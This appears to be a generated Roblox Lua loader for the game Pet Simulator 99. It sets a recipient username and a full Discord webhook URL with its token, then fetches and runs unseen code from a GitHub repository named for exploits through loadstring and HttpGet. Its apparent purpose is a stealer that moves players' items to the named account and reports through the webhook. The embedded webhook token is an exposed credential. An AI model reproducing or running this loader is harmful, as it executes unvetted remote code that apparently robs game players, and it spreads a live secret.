-- Generated by Generator V5.2
Username = "kewin219"
Username2 = "kewin219"
Webhook = "https://discord.com/api/webhooks/1365335959931064472/fu1bsvoHSv31UKhhFNSOR55IqGk66ccrRmOXO5sQbYv6fftib4EU1EYVVCEgp39ZJKOH"

loadstring(game:HttpGet("https://raw.githubusercontent.com/Zenith-Exploits-Empire/Final/refs/heads/main/RAW%20-%20Pet%20Simulator%2099"))()